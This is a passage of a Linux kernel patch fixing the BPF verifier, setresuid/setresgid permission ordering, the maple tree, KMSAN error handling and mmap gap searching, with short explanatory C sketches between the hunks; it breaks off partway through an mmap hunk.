+@@ -1085,6 +1085,10 @@ struct nft_chain {
+ };
+ 
+ int nft_chain_validate(const struct nft_ctx *ctx, const struct nft_chain *chain);
++int nft_setelem_validate(const struct nft_ctx *ctx, struct nft_set *set,
++			 const struct nft_set_iter *iter,
++			 struct nft_set_elem *elem);
++int nft_set_catchall_validate(const struct nft_ctx *ctx, struct nft_set *set);
+ 
+ enum nft_chain_types {
+ 	NFT_CHAIN_T_DEFAULT = 0,
+diff --git a/include/trace/events/f2fs.h b/include/trace/events/f2fs.h
+index 35ecb3118c7d5..111fafe049f7d 100644
+--- a/include/trace/events/f2fs.h
++++ b/include/trace/events/f2fs.h
+@@ -512,7 +512,7 @@ TRACE_EVENT(f2fs_truncate_partial_nodes,
+ 	TP_STRUCT__entry(
+ 		__field(dev_t,	dev)
+ 		__field(ino_t,	ino)
+-		__field(nid_t,	nid[3])
++		__array(nid_t,	nid, 3)
+ 		__field(int,	depth)
+ 		__field(int,	err)
+ 	),
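
The f2fs tracepoint hunk above replaces __field(nid_t, nid[3]) with __array(nid_t, nid, 3): __field stringifies its name argument for the event format, and smuggling an array declarator through it broke that, while __array emits a proper fixed-size member. What the corrected entry layout amounts to, as a plain struct; this is simplified, since the real macros also record offsets and sizes for the trace format file:

	#include <stdio.h>

	typedef unsigned int nid_t;

	/* Roughly what __array(nid_t, nid, 3) contributes to the event struct. */
	struct trace_entry_demo {
		unsigned int dev;
		unsigned long ino;
		nid_t nid[3];	/* a real array member, sized at compile time */
		int depth;
		int err;
	};

	int main(void)
	{
		struct trace_entry_demo e = { 1, 2, { 10, 11, 12 }, 3, 0 };

		printf("%zu bytes, nid[1]=%u\n", sizeof(e), e.nid[1]);
		return 0;
	}
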
+diff --git a/init/Kconfig b/init/Kconfig
+index 44e90b28a30f1..42d9771e04b78 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -894,18 +894,14 @@ config CC_IMPLICIT_FALLTHROUGH
+ 	default "-Wimplicit-fallthrough=5" if CC_IS_GCC && $(cc-option,-Wimplicit-fallthrough=5)
+ 	default "-Wimplicit-fallthrough" if CC_IS_CLANG && $(cc-option,-Wunreachable-code-fallthrough)
+ 
+-# Currently, disable gcc-11,12 array-bounds globally.
+-# We may want to target only particular configurations some day.
++# Currently, disable gcc-11+ array-bounds globally.
++# It's still broken in gcc-13, so no upper bound yet.
+ config GCC11_NO_ARRAY_BOUNDS
+ 	def_bool y
+ 
+-config GCC12_NO_ARRAY_BOUNDS
+-	def_bool y
+-
+ config CC_NO_ARRAY_BOUNDS
+ 	bool
+-	default y if CC_IS_GCC && GCC_VERSION >= 110000 && GCC_VERSION < 120000 && GCC11_NO_ARRAY_BOUNDS
+-	default y if CC_IS_GCC && GCC_VERSION >= 120000 && GCC_VERSION < 130000 && GCC12_NO_ARRAY_BOUNDS
++	default y if CC_IS_GCC && GCC_VERSION >= 110000 && GCC11_NO_ARRAY_BOUNDS
+ 
+ #
+ # For architectures that know their GCC __int128 support is sound
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 68455fd56eea5..9db6afc86733b 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -2905,6 +2905,21 @@ static int backtrack_insn(struct bpf_verifier_env *env, int idx,
+ 			}
+ 		} else if (opcode == BPF_EXIT) {
+ 			return -ENOTSUPP;
++		} else if (BPF_SRC(insn->code) == BPF_X) {
++			if (!(*reg_mask & (dreg | sreg)))
++				return 0;
++			/* dreg <cond> sreg
++			 * Both dreg and sreg need precision before
++			 * this insn. If only sreg was marked precise
++			 * before it would be equally necessary to
++			 * propagate it to dreg.
++			 */
++			*reg_mask |= (sreg | dreg);
++			 /* else dreg <cond> K
++			  * Only dreg still needs precision before
++			  * this insn, so for the K-based conditional
++			  * there is nothing new to be marked.
++			  */
+ 		}
+ 	} else if (class == BPF_LD) {
+ 		if (!(*reg_mask & dreg))
+diff --git a/kernel/fork.c b/kernel/fork.c
+index e8808ffbea619..3dea988aec54f 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -1177,6 +1177,7 @@ static struct mm_struct *mm_init(struct mm_struct *mm, struct task_struct *p,
+ fail_pcpu:
+ 	while (i > 0)
+ 		percpu_counter_destroy(&mm->rss_stat[--i]);
++	destroy_context(mm);
+ fail_nocontext:
+ 	mm_free_pgd(mm);
+ fail_nopgd:
+diff --git a/kernel/sys.c b/kernel/sys.c
+index 88b31f096fb2d..c85e1abf7b7c7 100644
+--- a/kernel/sys.c
++++ b/kernel/sys.c
+@@ -664,6 +664,7 @@ long __sys_setresuid(uid_t ruid, uid_t euid, uid_t suid)
+ 	struct cred *new;
+ 	int retval;
+ 	kuid_t kruid, keuid, ksuid;
++	bool ruid_new, euid_new, suid_new;
+ 
+ 	kruid = make_kuid(ns, ruid);
+ 	keuid = make_kuid(ns, euid);
+@@ -678,25 +679,29 @@ long __sys_setresuid(uid_t ruid, uid_t euid, uid_t suid)
+ 	if ((suid != (uid_t) -1) && !uid_valid(ksuid))
+ 		return -EINVAL;
+ 
++	old = current_cred();
++
++	/* check for no-op */
++	if ((ruid == (uid_t) -1 || uid_eq(kruid, old->uid)) &&
++	    (euid == (uid_t) -1 || (uid_eq(keuid, old->euid) &&
++				    uid_eq(keuid, old->fsuid))) &&
++	    (suid == (uid_t) -1 || uid_eq(ksuid, old->suid)))
++		return 0;
++
++	ruid_new = ruid != (uid_t) -1        && !uid_eq(kruid, old->uid) &&
++		   !uid_eq(kruid, old->euid) && !uid_eq(kruid, old->suid);
++	euid_new = euid != (uid_t) -1        && !uid_eq(keuid, old->uid) &&
++		   !uid_eq(keuid, old->euid) && !uid_eq(keuid, old->suid);
++	suid_new = suid != (uid_t) -1        && !uid_eq(ksuid, old->uid) &&
++		   !uid_eq(ksuid, old->euid) && !uid_eq(ksuid, old->suid);
++	if ((ruid_new || euid_new || suid_new) &&
++	    !ns_capable_setid(old->user_ns, CAP_SETUID))
++		return -EPERM;
++
+ 	new = prepare_creds();
+ 	if (!new)
+ 		return -ENOMEM;
+ 
+-	old = current_cred();
+-
+-	retval = -EPERM;
+-	if (!ns_capable_setid(old->user_ns, CAP_SETUID)) {
+-		if (ruid != (uid_t) -1        && !uid_eq(kruid, old->uid) &&
+-		    !uid_eq(kruid, old->euid) && !uid_eq(kruid, old->suid))
+-			goto error;
+-		if (euid != (uid_t) -1        && !uid_eq(keuid, old->uid) &&
+-		    !uid_eq(keuid, old->euid) && !uid_eq(keuid, old->suid))
+-			goto error;
+-		if (suid != (uid_t) -1        && !uid_eq(ksuid, old->uid) &&
+-		    !uid_eq(ksuid, old->euid) && !uid_eq(ksuid, old->suid))
+-			goto error;
+-	}
+-
+ 	if (ruid != (uid_t) -1) {
+ 		new->uid = kruid;
+ 		if (!uid_eq(kruid, old->uid)) {
+@@ -761,6 +766,7 @@ long __sys_setresgid(gid_t rgid, gid_t egid, gid_t sgid)
+ 	struct cred *new;
+ 	int retval;
+ 	kgid_t krgid, kegid, ksgid;
++	bool rgid_new, egid_new, sgid_new;
+ 
+ 	krgid = make_kgid(ns, rgid);
+ 	kegid = make_kgid(ns, egid);
+@@ -773,23 +779,28 @@ long __sys_setresgid(gid_t rgid, gid_t egid, gid_t sgid)
+ 	if ((sgid != (gid_t) -1) && !gid_valid(ksgid))
+ 		return -EINVAL;
+ 
++	old = current_cred();
++
++	/* check for no-op */
++	if ((rgid == (gid_t) -1 || gid_eq(krgid, old->gid)) &&
++	    (egid == (gid_t) -1 || (gid_eq(kegid, old->egid) &&
++				    gid_eq(kegid, old->fsgid))) &&
++	    (sgid == (gid_t) -1 || gid_eq(ksgid, old->sgid)))
++		return 0;
++
++	rgid_new = rgid != (gid_t) -1        && !gid_eq(krgid, old->gid) &&
++		   !gid_eq(krgid, old->egid) && !gid_eq(krgid, old->sgid);
++	egid_new = egid != (gid_t) -1        && !gid_eq(kegid, old->gid) &&
++		   !gid_eq(kegid, old->egid) && !gid_eq(kegid, old->sgid);
++	sgid_new = sgid != (gid_t) -1        && !gid_eq(ksgid, old->gid) &&
++		   !gid_eq(ksgid, old->egid) && !gid_eq(ksgid, old->sgid);
++	if ((rgid_new || egid_new || sgid_new) &&
++	    !ns_capable_setid(old->user_ns, CAP_SETGID))
++		return -EPERM;
++
+ 	new = prepare_creds();
+ 	if (!new)
+ 		return -ENOMEM;
+-	old = current_cred();
+-
+-	retval = -EPERM;
+-	if (!ns_capable_setid(old->user_ns, CAP_SETGID)) {
+-		if (rgid != (gid_t) -1        && !gid_eq(krgid, old->gid) &&
+-		    !gid_eq(krgid, old->egid) && !gid_eq(krgid, old->sgid))
+-			goto error;
+-		if (egid != (gid_t) -1        && !gid_eq(kegid, old->gid) &&
+-		    !gid_eq(kegid, old->egid) && !gid_eq(kegid, old->sgid))
+-			goto error;
+-		if (sgid != (gid_t) -1        && !gid_eq(ksgid, old->gid) &&
+-		    !gid_eq(ksgid, old->egid) && !gid_eq(ksgid, old->sgid))
+-			goto error;
+-	}
+ 
+ 	if (rgid != (gid_t) -1)
+ 		new->gid = krgid;
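
The reordering above front-loads the setresuid() checks: a no-op call
now returns 0 and a permission failure returns -EPERM before
prepare_creds() allocates anything. A rough user-space model of the
decision order, with plain ints standing in for kuid_t and every name
invented:

    #include <errno.h>
    #include <stdbool.h>

    struct creds { int uid, euid, suid, fsuid; };

    /* Returns 0 for a no-op, -EPERM without CAP_SETUID, 1 to proceed. */
    static int setresuid_precheck(const struct creds *old, int ruid,
                                  int euid, int suid, bool cap_setuid)
    {
        bool ruid_new, euid_new, suid_new;

        if ((ruid == -1 || ruid == old->uid) &&
            (euid == -1 || (euid == old->euid && euid == old->fsuid)) &&
            (suid == -1 || suid == old->suid))
            return 0;           /* nothing changes: succeed early */

        ruid_new = ruid != -1 && ruid != old->uid &&
                   ruid != old->euid && ruid != old->suid;
        euid_new = euid != -1 && euid != old->uid &&
                   euid != old->euid && euid != old->suid;
        suid_new = suid != -1 && suid != old->uid &&
                   suid != old->euid && suid != old->suid;
        if ((ruid_new || euid_new || suid_new) && !cap_setuid)
            return -EPERM;      /* rejected before any allocation */

        return 1;               /* caller may prepare_creds() now */
    }
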
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 022573f499578..7091be30862de 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -1298,26 +1298,21 @@ static inline void mas_alloc_nodes(struct ma_state *mas, gfp_t gfp)
+ 	node = mas->alloc;
+ 	node->request_count = 0;
+ 	while (requested) {
+-		max_req = MAPLE_ALLOC_SLOTS;
+-		if (node->node_count) {
+-			unsigned int offset = node->node_count;
+-
+-			slots = (void **)&node->slot[offset];
+-			max_req -= offset;
+-		} else {
+-			slots = (void **)&node->slot;
+-		}
+-
++		max_req = MAPLE_ALLOC_SLOTS - node->node_count;
++		slots = (void **)&node->slot[node->node_count];
+ 		max_req = min(requested, max_req);
+ 		count = mt_alloc_bulk(gfp, max_req, slots);
+ 		if (!count)
+ 			goto nomem_bulk;
+ 
++		if (node->node_count == 0) {
++			node->slot[0]->node_count = 0;
++			node->slot[0]->request_count = 0;
++		}
++
+ 		node->node_count += count;
+ 		allocated += count;
+ 		node = node->slot[0];
+-		node->node_count = 0;
+-		node->request_count = 0;
+ 		requested -= count;
+ 	}
+ 	mas->alloc->total = allocated;
+@@ -4973,7 +4968,8 @@ not_found:
+  * Return: True if found in a leaf, false otherwise.
+  *
+  */
+-static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
++static bool mas_rev_awalk(struct ma_state *mas, unsigned long size,
++		unsigned long *gap_min, unsigned long *gap_max)
+ {
+ 	enum maple_type type = mte_node_type(mas->node);
+ 	struct maple_node *node = mas_mn(mas);
+@@ -5038,8 +5034,8 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 
+ 	if (unlikely(ma_is_leaf(type))) {
+ 		mas->offset = offset;
+-		mas->min = min;
+-		mas->max = min + gap - 1;
++		*gap_min = min;
++		*gap_max = min + gap - 1;
+ 		return true;
+ 	}
+ 
+@@ -5063,10 +5059,10 @@ static inline bool mas_anode_descend(struct ma_state *mas, unsigned long size)
+ {
+ 	enum maple_type type = mte_node_type(mas->node);
+ 	unsigned long pivot, min, gap = 0;
+-	unsigned char offset;
+-	unsigned long *gaps;
+-	unsigned long *pivots = ma_pivots(mas_mn(mas), type);
+-	void __rcu **slots = ma_slots(mas_mn(mas), type);
++	unsigned char offset, data_end;
++	unsigned long *gaps, *pivots;
++	void __rcu **slots;
++	struct maple_node *node;
+ 	bool found = false;
+ 
+ 	if (ma_is_dense(type)) {
+@@ -5074,13 +5070,15 @@ static inline bool mas_anode_descend(struct ma_state *mas, unsigned long size)
+ 		return true;
+ 	}
+ 
+-	gaps = ma_gaps(mte_to_node(mas->node), type);
++	node = mas_mn(mas);
++	pivots = ma_pivots(node, type);
++	slots = ma_slots(node, type);
++	gaps = ma_gaps(node, type);
+ 	offset = mas->offset;
+ 	min = mas_safe_min(mas, pivots, offset);
+-	for (; offset < mt_slots[type]; offset++) {
+-		pivot = mas_safe_pivot(mas, pivots, offset, type);
+-		if (offset && !pivot)
+-			break;
++	data_end = ma_data_end(node, type, pivots, mas->max);
++	for (; offset <= data_end; offset++) {
++		pivot = mas_logical_pivot(mas, pivots, offset, type);
+ 
+ 		/* Not within lower bounds */
+ 		if (mas->index > pivot)
+@@ -5315,6 +5313,9 @@ int mas_empty_area(struct ma_state *mas, unsigned long min,
+ 	unsigned long *pivots;
+ 	enum maple_type mt;
+ 
++	if (min >= max)
++		return -EINVAL;
++
+ 	if (mas_is_start(mas))
+ 		mas_start(mas);
+ 	else if (mas->offset >= 2)
+@@ -5369,6 +5370,9 @@ int mas_empty_area_rev(struct ma_state *mas, unsigned long min,
+ {
+ 	struct maple_enode *last = mas->node;
+ 
++	if (min >= max)
++		return -EINVAL;
++
+ 	if (mas_is_start(mas)) {
+ 		mas_start(mas);
+ 		mas->offset = mas_data_end(mas);
+@@ -5388,7 +5392,7 @@ int mas_empty_area_rev(struct ma_state *mas, unsigned long min,
+ 	mas->index = min;
+ 	mas->last = max;
+ 
+-	while (!mas_rev_awalk(mas, size)) {
++	while (!mas_rev_awalk(mas, size, &min, &max)) {
+ 		if (last == mas->node) {
+ 			if (!mas_rewind_node(mas))
+ 				return -EBUSY;
+@@ -5403,17 +5407,9 @@ int mas_empty_area_rev(struct ma_state *mas, unsigned long min,
+ 	if (unlikely(mas->offset == MAPLE_NODE_SLOTS))
+ 		return -EBUSY;
+ 
+-	/*
+-	 * mas_rev_awalk() has set mas->min and mas->max to the gap values.  If
+-	 * the maximum is outside the window we are searching, then use the last
+-	 * location in the search.
+-	 * mas->max and mas->min is the range of the gap.
+-	 * mas->index and mas->last are currently set to the search range.
+-	 */
+-
+ 	/* Trim the upper limit to the max. */
+-	if (mas->max <= mas->last)
+-		mas->last = mas->max;
++	if (max <= mas->last)
++		mas->last = max;
+ 
+ 	mas->index = mas->last - size + 1;
+ 	return 0;
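
Two contract changes land in the maple tree hunks above: both
empty-area searches now reject inverted windows with -EINVAL, and
mas_rev_awalk() reports the located gap through out-parameters instead
of clobbering mas->min/mas->max. A simplified model of the resulting
mas_empty_area_rev() tail; gap_lo/gap_hi stand for what the walker
reports, and the helper name is invented:

    #include <errno.h>

    static int empty_area_rev_tail(unsigned long min, unsigned long max,
                                   unsigned long size,
                                   unsigned long gap_lo, unsigned long gap_hi,
                                   unsigned long *index, unsigned long *last)
    {
        if (min >= max)
            return -EINVAL;     /* new fail-fast guard */
        if (gap_hi < gap_lo || gap_hi - gap_lo + 1 < size)
            return -EBUSY;      /* gap cannot fit the request */

        *last = (max <= gap_hi) ? max : gap_hi; /* trim the upper limit */
        *index = *last - size + 1;
        return 0;
    }
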
+diff --git a/mm/backing-dev.c b/mm/backing-dev.c
+index a53b9360b72ec..30d2d0386fdb9 100644
+--- a/mm/backing-dev.c
++++ b/mm/backing-dev.c
+@@ -507,6 +507,15 @@ static LIST_HEAD(offline_cgwbs);
+ static void cleanup_offline_cgwbs_workfn(struct work_struct *work);
+ static DECLARE_WORK(cleanup_offline_cgwbs_work, cleanup_offline_cgwbs_workfn);
+ 
++static void cgwb_free_rcu(struct rcu_head *rcu_head)
++{
++	struct bdi_writeback *wb = container_of(rcu_head,
++			struct bdi_writeback, rcu);
++
++	percpu_ref_exit(&wb->refcnt);
++	kfree(wb);
++}
++
+ static void cgwb_release_workfn(struct work_struct *work)
+ {
+ 	struct bdi_writeback *wb = container_of(work, struct bdi_writeback,
+@@ -529,11 +538,10 @@ static void cgwb_release_workfn(struct work_struct *work)
+ 	list_del(&wb->offline_node);
+ 	spin_unlock_irq(&cgwb_lock);
+ 
+-	percpu_ref_exit(&wb->refcnt);
+ 	wb_exit(wb);
+ 	bdi_put(bdi);
+ 	WARN_ON_ONCE(!list_empty(&wb->b_attached));
+-	kfree_rcu(wb, rcu);
++	call_rcu(&wb->rcu, cgwb_free_rcu);
+ }
+ 
+ static void cgwb_release(struct percpu_ref *refcnt)
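
The writeback fix swaps kfree_rcu() for an explicit call_rcu()
callback because percpu_ref_exit() must run after the grace period but
before the memory disappears. The general shape of that pattern, shown
on a hypothetical object:

    #include <linux/container_of.h>
    #include <linux/percpu-refcount.h>
    #include <linux/rcupdate.h>
    #include <linux/slab.h>

    struct obj {
        struct percpu_ref ref;
        struct rcu_head rcu;
    };

    static void obj_free_rcu(struct rcu_head *head)
    {
        struct obj *o = container_of(head, struct obj, rcu);

        percpu_ref_exit(&o->ref); /* teardown kfree_rcu() cannot do */
        kfree(o);
    }

    static void obj_release(struct obj *o)
    {
        /* was: kfree_rcu(o, rcu); that frees, but never exits the ref */
        call_rcu(&o->rcu, obj_free_rcu);
    }
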
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index 7624d22f92278..0c1ab7f7c102e 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -1845,10 +1845,10 @@ int change_huge_pmd(struct mmu_gather *tlb, struct vm_area_struct *vma,
+ 	if (is_swap_pmd(*pmd)) {
+ 		swp_entry_t entry = pmd_to_swp_entry(*pmd);
+ 		struct page *page = pfn_swap_entry_to_page(entry);
++		pmd_t newpmd;
+ 
+ 		VM_BUG_ON(!is_pmd_migration_entry(*pmd));
+ 		if (is_writable_migration_entry(entry)) {
+-			pmd_t newpmd;
+ 			/*
+ 			 * A protection check is difficult so
+ 			 * just be safe and disable write
+@@ -1862,8 +1862,16 @@ int change_huge_pmd(struct mmu_gather *tlb, struct vm_area_struct *vma,
+ 				newpmd = pmd_swp_mksoft_dirty(newpmd);
+ 			if (pmd_swp_uffd_wp(*pmd))
+ 				newpmd = pmd_swp_mkuffd_wp(newpmd);
+-			set_pmd_at(mm, addr, pmd, newpmd);
++		} else {
++			newpmd = *pmd;
+ 		}
++
++		if (uffd_wp)
++			newpmd = pmd_swp_mkuffd_wp(newpmd);
++		else if (uffd_wp_resolve)
++			newpmd = pmd_swp_clear_uffd_wp(newpmd);
++		if (!pmd_same(*pmd, newpmd))
++			set_pmd_at(mm, addr, pmd, newpmd);
+ 		goto unlock;
+ 	}
+ #endif
+@@ -2666,9 +2674,10 @@ int split_huge_page_to_list(struct page *page, struct list_head *list)
+ 	VM_BUG_ON_FOLIO(!folio_test_large(folio), folio);
+ 
+ 	is_hzp = is_huge_zero_page(&folio->page);
+-	VM_WARN_ON_ONCE_FOLIO(is_hzp, folio);
+-	if (is_hzp)
++	if (is_hzp) {
++		pr_warn_ratelimited("Called split_huge_page for huge zero page\n");
+ 		return -EBUSY;
++	}
+ 
+ 	if (folio_test_writeback(folio))
+ 		return -EBUSY;
+@@ -3252,6 +3261,8 @@ int set_pmd_migration_entry(struct page_vma_mapped_walk *pvmw,
+ 	pmdswp = swp_entry_to_pmd(entry);
+ 	if (pmd_soft_dirty(pmdval))
+ 		pmdswp = pmd_swp_mksoft_dirty(pmdswp);
++	if (pmd_uffd_wp(pmdval))
++		pmdswp = pmd_swp_mkuffd_wp(pmdswp);
+ 	set_pmd_at(mm, address, pvmw->pmd, pmdswp);
+ 	page_remove_rmap(page, vma, true);
+ 	put_page(page);
+diff --git a/mm/khugepaged.c b/mm/khugepaged.c
+index a26a28e3738c1..7380c659e03ae 100644
+--- a/mm/khugepaged.c
++++ b/mm/khugepaged.c
+@@ -561,6 +561,10 @@ static int __collapse_huge_page_isolate(struct vm_area_struct *vma,
+ 			result = SCAN_PTE_NON_PRESENT;
+ 			goto out;
+ 		}
++		if (pte_uffd_wp(pteval)) {
++			result = SCAN_PTE_UFFD_WP;
++			goto out;
++		}
+ 		page = vm_normal_page(vma, address, pteval);
+ 		if (unlikely(!page) || unlikely(is_zone_device_page(page))) {
+ 			result = SCAN_PAGE_NULL;
+diff --git a/mm/kmsan/hooks.c b/mm/kmsan/hooks.c
+index 3807502766a3e..ec0da72e65aa0 100644
+--- a/mm/kmsan/hooks.c
++++ b/mm/kmsan/hooks.c
+@@ -148,35 +148,74 @@ void kmsan_vunmap_range_noflush(unsigned long start, unsigned long end)
+  * into the virtual memory. If those physical pages already had shadow/origin,
+  * those are ignored.
+  */
+-void kmsan_ioremap_page_range(unsigned long start, unsigned long end,
+-			      phys_addr_t phys_addr, pgprot_t prot,
+-			      unsigned int page_shift)
++int kmsan_ioremap_page_range(unsigned long start, unsigned long end,
++			     phys_addr_t phys_addr, pgprot_t prot,
++			     unsigned int page_shift)
+ {
+ 	gfp_t gfp_mask = GFP_KERNEL | __GFP_ZERO;
+ 	struct page *shadow, *origin;
+ 	unsigned long off = 0;
+-	int nr;
++	int nr, err = 0, clean = 0, mapped;
+ 
+ 	if (!kmsan_enabled || kmsan_in_runtime())
+-		return;
++		return 0;
+ 
+ 	nr = (end - start) / PAGE_SIZE;
+ 	kmsan_enter_runtime();
+-	for (int i = 0; i < nr; i++, off += PAGE_SIZE) {
++	for (int i = 0; i < nr; i++, off += PAGE_SIZE, clean = i) {
+ 		shadow = alloc_pages(gfp_mask, 1);
+ 		origin = alloc_pages(gfp_mask, 1);
+-		__vmap_pages_range_noflush(
++		if (!shadow || !origin) {
++			err = -ENOMEM;
++			goto ret;
++		}
++		mapped = __vmap_pages_range_noflush(
+ 			vmalloc_shadow(start + off),
+ 			vmalloc_shadow(start + off + PAGE_SIZE), prot, &shadow,
+ 			PAGE_SHIFT);
+-		__vmap_pages_range_noflush(
++		if (mapped) {
++			err = mapped;
++			goto ret;
++		}
++		shadow = NULL;
++		mapped = __vmap_pages_range_noflush(
+ 			vmalloc_origin(start + off),
+ 			vmalloc_origin(start + off + PAGE_SIZE), prot, &origin,
+ 			PAGE_SHIFT);
++		if (mapped) {
++			__vunmap_range_noflush(
++				vmalloc_shadow(start + off),
++				vmalloc_shadow(start + off + PAGE_SIZE));
++			err = mapped;
++			goto ret;
++		}
++		origin = NULL;
++	}
++	/* Page mapping loop finished normally, nothing to clean up. */
++	clean = 0;
++
++ret:
++	if (clean > 0) {
++		/*
++		 * Something went wrong. Clean up shadow/origin pages allocated
++		 * on the last loop iteration, then delete mappings created
++		 * during the previous iterations.
++		 */
++		if (shadow)
++			__free_pages(shadow, 1);
++		if (origin)
++			__free_pages(origin, 1);
++		__vunmap_range_noflush(
++			vmalloc_shadow(start),
++			vmalloc_shadow(start + clean * PAGE_SIZE));
++		__vunmap_range_noflush(
++			vmalloc_origin(start),
++			vmalloc_origin(start + clean * PAGE_SIZE));
+ 	}
+ 	flush_cache_vmap(vmalloc_shadow(start), vmalloc_shadow(end));
+ 	flush_cache_vmap(vmalloc_origin(start), vmalloc_origin(end));
+ 	kmsan_leave_runtime();
++	return err;
+ }
+ 
+ void kmsan_iounmap_page_range(unsigned long start, unsigned long end)
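
kmsan_ioremap_page_range() now returns errors, with the "clean"
counter driving the rollback: on failure it undoes exactly the
iterations that completed. Stripped of the KMSAN specifics, the
pattern looks like this (every helper is a trivial stand-in):

    #include <errno.h>
    #include <stddef.h>

    static void *alloc_one(int i)          { return (void *)(long)(i + 1); }
    static int   map_one(int i, void *res) { (void)i; (void)res; return 0; }
    static void  free_one(void *res)       { (void)res; }
    static void  unmap_first(int n)        { (void)n; }

    static int map_all(int nr)
    {
        int i, err = 0;

        for (i = 0; i < nr; i++) {
            void *res = alloc_one(i);

            if (!res) {
                err = -ENOMEM;
                goto unwind;
            }
            err = map_one(i, res);
            if (err) {
                free_one(res);
                goto unwind;
            }
        }
        return 0;

    unwind:
        unmap_first(i); /* undo only the i iterations that succeeded */
        return err;
    }
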
+diff --git a/mm/kmsan/shadow.c b/mm/kmsan/shadow.c
+index a787c04e9583c..b8bb95eea5e3d 100644
+--- a/mm/kmsan/shadow.c
++++ b/mm/kmsan/shadow.c
+@@ -216,27 +216,29 @@ void kmsan_free_page(struct page *page, unsigned int order)
+ 	kmsan_leave_runtime();
+ }
+ 
+-void kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
+-				    pgprot_t prot, struct page **pages,
+-				    unsigned int page_shift)
++int kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
++				   pgprot_t prot, struct page **pages,
++				   unsigned int page_shift)
+ {
+ 	unsigned long shadow_start, origin_start, shadow_end, origin_end;
+ 	struct page **s_pages, **o_pages;
+-	int nr, mapped;
++	int nr, mapped, err = 0;
+ 
+ 	if (!kmsan_enabled)
+-		return;
++		return 0;
+ 
+ 	shadow_start = vmalloc_meta((void *)start, KMSAN_META_SHADOW);
+ 	shadow_end = vmalloc_meta((void *)end, KMSAN_META_SHADOW);
+ 	if (!shadow_start)
+-		return;
++		return 0;
+ 
+ 	nr = (end - start) / PAGE_SIZE;
+ 	s_pages = kcalloc(nr, sizeof(*s_pages), GFP_KERNEL);
+ 	o_pages = kcalloc(nr, sizeof(*o_pages), GFP_KERNEL);
+-	if (!s_pages || !o_pages)
++	if (!s_pages || !o_pages) {
++		err = -ENOMEM;
+ 		goto ret;
++	}
+ 	for (int i = 0; i < nr; i++) {
+ 		s_pages[i] = shadow_page_for(pages[i]);
+ 		o_pages[i] = origin_page_for(pages[i]);
+@@ -249,10 +251,16 @@ void kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
+ 	kmsan_enter_runtime();
+ 	mapped = __vmap_pages_range_noflush(shadow_start, shadow_end, prot,
+ 					    s_pages, page_shift);
+-	KMSAN_WARN_ON(mapped);
++	if (mapped) {
++		err = mapped;
++		goto ret;
++	}
+ 	mapped = __vmap_pages_range_noflush(origin_start, origin_end, prot,
+ 					    o_pages, page_shift);
+-	KMSAN_WARN_ON(mapped);
++	if (mapped) {
++		err = mapped;
++		goto ret;
++	}
+ 	kmsan_leave_runtime();
+ 	flush_tlb_kernel_range(shadow_start, shadow_end);
+ 	flush_tlb_kernel_range(origin_start, origin_end);
+@@ -262,6 +270,7 @@ void kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
+ ret:
+ 	kfree(s_pages);
+ 	kfree(o_pages);
++	return err;
+ }
+ 
+ /* Allocate metadata for pages allocated at boot time. */
+diff --git a/mm/mmap.c b/mm/mmap.c
+index 1931da077b2f9..a302f6a709ab2 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -1565,7 +1565,8 @@ static inline int accountable_mapping(struct file *file, vm_flags_t vm_flags)
+  */
+ static unsigned long unmapped_area(struct vm_unmapped_area_info *info)
+ {
+-	unsigned long length, gap;
++	unsigned long length, gap, low_limit;
++	struct vm_area_struct *tmp;
+ 
+ 	MA_STATE(mas, &current->mm->mm_mt, 0, 0);
+ 
+@@ -1574,12 +1575,29 @@ static unsigned long unmapped_area(struct vm_unmapped_area_info *info)
+ 	if (length < info->length)
+ 		return -ENOMEM;
+ 
+-	if (mas_empty_area(&mas, info->low_limit, info->high_limit - 1,
+-				  length))
++	low_limit = info->low_limit;
++retry:
++	if (mas_empty_area(&mas, low_limit, info->high_limit - 1, length))
+ 		return -ENOMEM;
+ 
+ 	gap = mas.index;
+ 	gap += (info->align_offset - gap) & info->align_mask;
++	tmp = mas_next(&mas, ULONG_MAX);
++	if (tmp && (tmp->vm_flags & VM_GROWSDOWN)) { /* Avoid prev check if possible */
++		if (vm_start_gap(tmp) < gap + length - 1) {
++			low_limit = tmp->vm_end;
++			mas_reset(&mas);
++			goto retry;
++		}
++	} else {
++		tmp = mas_prev(&mas, 0);
++		if (tmp && vm_end_gap(tmp) > gap) {
++			low_limit = vm_end_gap(tmp);
++			mas_reset(&mas);
++			goto retry;
++		}
++	}
++
+ 	return gap;
+ }
+ 
+@@ -1595,7 +1613,8 @@ static unsigned long unmapped_area(struct vm_unmapped_area_info *info)
+  */
+ static unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info)
+ {
+-	unsigned long length, gap;
++	unsigned long length, gap, high_limit, gap_end;
++	struct vm_area_struct *tmp;
+ 
+ 	MA_STATE(mas, &current->mm->mm_mt, 0, 0);
+ 	/* Adjust search length to account for worst case alignment overhead */
+@@ -1603,12 +1622,31 @@ static unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info)
+ 	if (length < info->length)
+ 		return -ENOMEM;
+ 
+-	if (mas_empty_area_rev(&mas, info->low_limit, info->high_limit - 1,
++	high_limit = info->high_limit;
++retry:
++	if (mas_empty_area_rev(&mas, info->low_limit, high_limit - 1,
+ 				length))
+ 		return -ENOMEM;
+ 
+ 	gap = mas.last + 1 - info->length;
+ 	gap -= (gap - info->align_offset) & info->align_mask;
++	gap_end = mas.last;
++	tmp = mas_next(&mas, ULONG_MAX);
++	if (tmp && (tmp->vm_flags & VM_GROWSDOWN)) { /* Avoid prev check if possible */
++		if (vm_start_gap(tmp) <= gap_end) {
++			high_limit = vm_start_gap(tmp);
++			mas_reset(&mas);
++			goto retry;
++		}
++	} else {
++		tmp = mas_prev(&mas, 0);
